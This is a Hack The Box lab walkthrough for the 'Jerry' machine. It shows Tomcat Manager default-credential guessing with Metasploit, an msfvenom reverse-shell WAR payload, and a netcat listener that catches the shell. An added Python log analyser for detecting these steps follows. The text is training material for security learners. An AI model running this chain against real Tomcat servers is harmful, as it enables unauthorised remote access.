9/16/2024

HTB: Jerry

 ___  ___  _________  ________                        
|\  \|\  \|\___   ___\\   __  \  ___                  
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                 
 \ \   __  \   \ \  \ \ \   __  \|__|     _  _             
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___  (o)(o)--.           
   \ \__\ \__\   \ \__\ \ \_______\|\__\  \xx/ (  )       
    \|__|\|__|    \|__|  \|_______|\|__|  m\/m--m'`--.      
    ___  _______   ________  ________      ___    ___ 
   |\  \|\  ___ \ |\   __  \|\   __  \    |\  \  /  /|
   \ \  \ \   __/|\ \  \|\  \ \  \|\  \   \ \  \/  / /
 __ \ \  \ \  \_|/_\ \   _  _\ \   _  _\   \ \    / / 
|\  \\_\  \ \  \_|\ \ \  \\  \\ \  \\  \|   \/  /  /  
\ \________\ \_______\ \__\\ _\\ \__\\ _\ __/  / /    
 \|________|\|_______|\|__|\|__|\|__|\|__|\___/ /     
                                         \|___|/      

Hack The Box's Jerry is an Easy-rated Windows machine featuring an Apache Tomcat web server that can be compromised with default Manager login credentials and a reverse shell payload generated with MSFvenom.

Once you have started the machine on HTB and connected to the HTB VPN, open a terminal and ping the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot the target machine.

ping 10.10.10.95

You should receive responses from the IP address. Press CTRL + C to stop sending packets to the target host. Once the network is confirmed up, it's time to move on to enumeration with Nmap.

Start with a quick service scan using Nmap. The -sV switch enables version detection. You can learn more about Nmap at https://nmap.org.

nmap -sV 10.10.10.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 12:51 CDT
Nmap scan report for 10.10.10.95
Host is up (0.0088s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.57 seconds

We can see an Apache Tomcat web server running on port 8080. Navigate to the site by entering the target's IP address followed by :8080 into the address bar of your web browser. On inspecting the page, we can see that the server's Manager app is reachable at /manager/html. Unfortunately, we are met with a login prompt.

Let's test the login against a wordlist of default Tomcat credentials using Metasploit. Open Metasploit in a new terminal by typing "msfconsole".

msfconsole
Metasploit tip: Use help <command> to learn more about any command
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >>

Let's search for Tomcat exploits using the "search" option.

search tomcat

Matching Modules
================

   #   Name                                                            Disclosure Date  Rank       Check  Description
   -   ----                                                            ---------------  ----       -----  -----------
   0   auxiliary/dos/http/apache_commons_fileupload_dos                2014-02-06       normal     No     Apache Commons FileUpload and Apache Tomcat DoS
   1   exploit/multi/http/struts_dev_mode                              2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution
   2   exploit/multi/http/struts2_namespace_ognl                       2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   3   exploit/multi/http/struts_code_exec_classloader                 2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   4   auxiliary/admin/http/tomcat_ghostcat                            2020-02-20       normal     Yes    Apache Tomcat AJP File Read
   5   exploit/windows/http/tomcat_cgi_cmdlineargs                     2019-04-10       excellent  Yes    Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
   6   exploit/multi/http/tomcat_mgr_deploy                            2009-11-09       excellent  Yes    Apache Tomcat Manager Application Deployer Authenticated Code Execution
   7   exploit/multi/http/tomcat_mgr_upload                            2009-11-09       excellent  Yes    Apache Tomcat Manager Authenticated Upload Code Execution
   8   auxiliary/dos/http/apache_tomcat_transfer_encoding              2010-07-09       normal     No     Apache Tomcat Transfer-Encoding Information Disclosure and DoS
   9   auxiliary/scanner/http/tomcat_enum                                               normal     No     Apache Tomcat User Enumeration
   10  exploit/linux/local/tomcat_rhel_based_temp_priv_esc             2016-10-10       manual     Yes    Apache Tomcat on RedHat Based Systems Insecure Temp Config Privilege Escalation
   11  exploit/linux/local/tomcat_ubuntu_log_init_priv_esc             2016-09-30       manual     Yes    Apache Tomcat on Ubuntu Log Init Privilege Escalation
   12  exploit/multi/http/atlassian_confluence_webwork_ognl_injection  2021-08-25       excellent  Yes    Atlassian Confluence WebWork OGNL Injection
   13  exploit/windows/http/cayin_xpost_sql_rce                        2020-06-04       excellent  Yes    Cayin xPost wayfinder_seqid SQLi to RCE
   14  exploit/multi/http/cisco_dcnm_upload_2019                       2019-06-26       excellent  Yes    Cisco Data Center Network Manager Unauthenticated Remote Code Execution
   15  exploit/linux/http/cisco_hyperflex_hx_data_platform_cmd_exec    2021-05-05       excellent  Yes    Cisco HyperFlex HX Data Platform Command Execution
   16  exploit/linux/http/cisco_hyperflex_file_upload_rce              2021-05-05       excellent  Yes    Cisco HyperFlex HX Data Platform unauthenticated file upload to RCE (CVE-2021-1499)
   17  exploit/linux/http/cpi_tararchive_upload                        2019-05-15       excellent  Yes    Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability
   18  exploit/linux/http/cisco_prime_inf_rce                          2018-10-04       excellent  Yes    Cisco Prime Infrastructure Unauthenticated Remote Code Execution
   19  post/multi/gather/tomcat_gather                                                  normal     No     Gather Tomcat Credentials
   20  auxiliary/dos/http/hashcollision_dos                            2011-12-28       normal     No     Hashtable Collisions
   21  auxiliary/admin/http/ibm_drm_download                           2020-04-21       normal     Yes    IBM Data Risk Manager Arbitrary File Download
   22  exploit/linux/http/lucee_admin_imgprocess_file_write            2021-01-15       excellent  Yes    Lucee Administrator imgProcess.cfm Arbitrary File Write
   23  exploit/linux/http/mobileiron_core_log4shell                    2021-12-12       excellent  Yes    MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)
   24  exploit/multi/http/zenworks_configuration_management_upload     2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload
   25  exploit/multi/http/spring_framework_rce_spring4shell            2022-03-31       manual     Yes    Spring Framework Class property RCE (Spring4Shell)
   26  auxiliary/admin/http/tomcat_administration                                       normal     No     Tomcat Administration Tool Default Access
   27  auxiliary/scanner/http/tomcat_mgr_login                                          normal     No     Tomcat Application Manager Login Utility
   28  exploit/multi/http/tomcat_jsp_upload_bypass                     2017-10-03       excellent  Yes    Tomcat RCE via JSP Upload Bypass
   29  auxiliary/admin/http/tomcat_utf8_traversal                      2009-01-09       normal     No     Tomcat UTF-8 Directory Traversal Vulnerability
   30  auxiliary/admin/http/trendmicro_dlp_traversal                   2009-01-09       normal     No     TrendMicro Data Loss Prevention 5.5 Directory Traversal
   31  post/windows/gather/enum_tomcat                                                  normal     No     Windows Gather Apache Tomcat Enumeration


Interact with a module by name or index. For example info 31, use 31 or use post/windows/gather/enum_tomcat

[msf](Jobs:0 Agents:0) >> 

We see an auxiliary/scanner/http/tomcat_mgr_login module. To use a module, type "use" followed by the module's index number from the search results.

Once the exploit has loaded, type "options" and hit Enter. This will bring up the options which we will need to configure.

use 27
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                            Required  Description
   ----              ---------------                            --------  -----------
   ANONYMOUS_LOGIN   false                                      yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false                                      no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                          yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                      no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                      no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                      no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                       no        Skip existing credentials stored in the current database (Accepted: none, u
                                                                          ser, user&realm)
   PASSWORD                                                     no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/word  no        File containing passwords, one per line
                     lists/tomcat_mgr_default_pass.txt
   Proxies                                                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b
                                                                          asics/using-metasploit.html
   RPORT             8080                                       yes       The target port (TCP)
   SSL               false                                      no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                      yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                              yes       URI for Manager login. Default is /manager/html
   THREADS           1                                          yes       The number of concurrent threads (max one per host)
   USERNAME                                                     no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/word  no        File containing users and passwords separated by space, one pair per line
                     lists/tomcat_mgr_default_userpass.txt
   USER_AS_PASS      false                                      no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/word  no        File containing users, one per line
                     lists/tomcat_mgr_default_users.txt
   VERBOSE           true                                       yes       Whether to print output for all attempts
   VHOST                                                        no        HTTP server virtual host


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >>

RPORT is already set to the correct port, but RHOSTS is blank and is required for the module to run. Set it by typing "set RHOSTS" followed by the IP of the target machine and hitting Enter. A confirmation line will echo the RHOSTS value.

set RHOSTS 10.10.10.95
RHOSTS => 10.10.10.95
[msf](Jobs:0 Agents:0) auxiliary(scanner/http/tomcat_mgr_login) >> 

With everything set, it's time to run the module! Type "run" and hit Enter. When the scan finishes, we can see a successful login using the credentials "tomcat:s3cret"! We can now navigate back to the web server in our browser and access the Manager dashboard.

On the dashboard we see an option to upload a WAR file. A WAR file is an archive used to distribute JAR files, Java classes, XML files, tag libraries, static web pages and other resources that together make up a web application. We can instead use this to upload a malicious payload!

Let's generate a reverse TCP payload using MSFvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f war > jerry_warcia.war
Payload size: 1102 bytes
Final size of war file: 1102 bytes

We can now upload this .war file through the Tomcat dashboard and deploy it on the server. Once it has been uploaded, open a Netcat listener in your terminal. Then click the name of the uploaded payload back on the Tomcat dashboard to establish the connection. Netcat should now have a shell:

nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>
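As a defender's counterpart to the two steps above (the credential guessing against /manager/html and the WAR upload through the Manager), here is an added Python example that is not part of the original write-up: it scans Tomcat access-log lines in the default AccessLogValve format for a burst of 401s on the Manager, a successful login right after them, and a deploy request. The log lines are constructed for the example, and the threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Tomcat AccessLogValve default pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
MANAGER_PREFIX = "/manager/"
# Manager requests that deploy a new web application (HTML form upload, text API deploy)
DEPLOY_ROUTES = {("POST", "/manager/html/upload"), ("PUT", "/manager/text/deploy")}

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop query string (e.g. CSRF nonce)
    return rec

def analyze(lines, fail_threshold=5, window_seconds=60):
    """Return findings for Manager password guessing and deployments (thresholds assumed)."""
    findings = []
    failures = defaultdict(list)  # client IP -> timestamps of recent 401s on /manager/
    for rec in filter(None, map(parse_line, lines)):
        if not rec["path"].startswith(MANAGER_PREFIX):
            continue
        host, t = rec["host"], rec["time"]
        if rec["status"] == 401:
            recent = [x for x in failures[host] if (t - x).total_seconds() <= window_seconds]
            recent.append(t)
            failures[host] = recent
            if len(recent) == fail_threshold:  # fire once when the burst crosses the threshold
                findings.append({"type": "manager_bruteforce", "host": host, "count": len(recent)})
        elif rec["status"] < 400:
            if failures[host]:  # success immediately following a burst of failures
                findings.append({"type": "login_after_failures", "host": host,
                                 "user": rec["user"], "failures": len(failures[host])})
                failures[host] = []
            if (rec["method"], rec["path"]) in DEPLOY_ROUTES:
                findings.append({"type": "war_deploy", "host": host, "user": rec["user"]})
    return findings

# Constructed sample log: one normal admin login, then six failed guesses, a success, and an upload.
SAMPLE_LOG = """\
10.10.14.50 - admin [13/Sep/2024:12:50:00 -0500] "GET /manager/html HTTP/1.1" 200 11958
10.10.14.13 - - [13/Sep/2024:12:55:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - - [13/Sep/2024:12:55:01 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - - [13/Sep/2024:12:55:02 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - - [13/Sep/2024:12:55:02 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - - [13/Sep/2024:12:55:03 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - - [13/Sep/2024:12:55:03 -0500] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.13 - tomcat [13/Sep/2024:12:55:04 -0500] "GET /manager/html HTTP/1.1" 200 11958
10.10.14.13 - tomcat [13/Sep/2024:12:56:30 -0500] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 12440
10.10.14.13 - - [13/Sep/2024:12:57:01 -0500] "GET /jerry_warcia/ HTTP/1.1" 200 0
""".splitlines()

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f)
```

Run against a real localhost_access_log file the same way; a legitimate deployment still shows up as a war_deploy finding, so it pairs with the login_after_failures finding to separate an operator from a guessed password.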

You can now navigate through the target system to obtain the user.txt and root.txt flags.